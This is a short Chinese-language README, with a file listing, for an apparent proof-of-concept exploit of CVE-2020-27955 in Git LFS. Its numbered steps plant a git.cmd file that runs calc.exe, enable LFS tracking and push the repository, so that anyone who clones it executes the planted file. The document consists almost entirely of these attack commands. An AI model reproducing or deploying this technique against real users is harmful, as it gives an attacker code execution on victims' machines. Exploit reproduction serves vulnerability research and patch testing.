cve-2020-27955# cve-2020-27955
cve-2020-27955
#### 复现
1. 创建github仓库
2. git clone https://github.com/attacker/poc.git .
3. echo calc.exe > git.cmd
4. git lfs track “*.dat”
5. echo “Junk” > large.dat
6. git add -A
7. git commit -m “POC”
8. git push -u origin master -f
[4.0K] /data/pocs/e739b0247aebea1acca7a4b34f4064446c6bcbc7
├── [ 9] git.cmd
├── [ 5] large.dat
└── [ 278] README.md
0 directories, 3 files